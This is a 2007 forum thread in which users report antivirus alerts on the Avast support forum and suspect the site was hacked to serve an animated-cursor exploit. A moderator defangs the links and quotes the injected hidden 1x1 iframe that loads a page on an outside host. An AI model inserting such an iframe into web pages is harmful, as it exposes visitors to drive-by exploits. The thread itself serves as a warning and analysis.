![]() |
|
#1
|
||||
|
||||
|
Alwil's credibility just hit the ground floor like an elevator with the wires cut...
Go here and see what NOD32 does: h__p://forum.avast.com/ Last edited by Bubba : August 24th, 2007 at 06:48 PM. Reason: altered link |
|
#2
|
||||
|
||||
|
Quote:
Hmm... surprising, yet common sense says FP.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm Last edited by Bubba : August 24th, 2007 at 06:48 PM. Reason: altered link |
|
#3
|
||||
|
||||
|
Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!
Last edited by JeremyWW : August 24th, 2007 at 07:24 PM. |
|
#4
|
|||
|
|||
|
F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
|
|
#5
|
||||
|
||||
|
Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!!
![]() |
|
#6
|
|||
|
|||
|
Run an On Demand Scan and then look at your log.
|
|
#7
|
||||
|
||||
|
Oooer
![]() This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm |
|
#8
|
||||
|
||||
|
Quote:
Doing it now... |
|
#9
|
|||
|
|||
|
Quote:
I only get it in IE, not in FF, perhaps that ad blocking plug in stops it. |
|
#10
|
||||
|
||||
|
Quote:
In depth scan finished: Clean machine... |
|
#11
|
|||
|
|||
|
Quote:
Look at the log, do you have a bunch of "internal errors"? |
|
#12
|
||||
|
||||
|
Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
|
|
#13
|
||||
|
||||
|
I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm |
|
#14
|
||||
|
||||
|
Quote:
No. I'm looking for that specific string, yes? Nothing... OK...just one, but nothing to do with anything... 24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error |
|
#15
|
||||
|
||||
|
Noticed this earlyer.
Thought LSP was giving me a FP. Maybe not. Site may have been hacked I know this has happened to other sites forum and not in the past. Anyone else can confirm this?
__________________
"What a long, strange trip it's been" |
|
#16
|
|||
|
|||
|
Quote:
Correct, 2.7 works like a charm. |
|
#17
|
||||
|
||||
|
Quote:
Yup... |
|
#18
|
|||
|
|||
|
Quote:
I have thousands of them. 228 pages in a word document!! |
|
#19
|
||||
|
||||
|
Hacking is looking quite likely here
![]()
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm |
|
#20
|
|||
|
|||
|
Quote:
Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely). |
|
#21
|
||||
|
||||
|
We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.
<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe> Thanks Bubba |
|
#22
|
||||
|
||||
|
I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm |
|
#23
|
||||
|
||||
|
Hehe.. Just a bit funny though that many others detect it also then.
![]() |
|
#24
|
||||
|
||||
|
Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months
Quite exciting to get a real alert for once...
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm Last edited by Bubba : August 24th, 2007 at 07:11 PM. Reason: fixed my screw up....sorry :( |
|
#25
|
||||
|
||||
|
Quote:
Windows Animated Cursor Stack Overflow Vulnerability portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link Quote:
We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware. Procede with caution, Bubba |
| « Previous Thread | Next Thread » |
| Thread Tools | Search this Thread |
|
|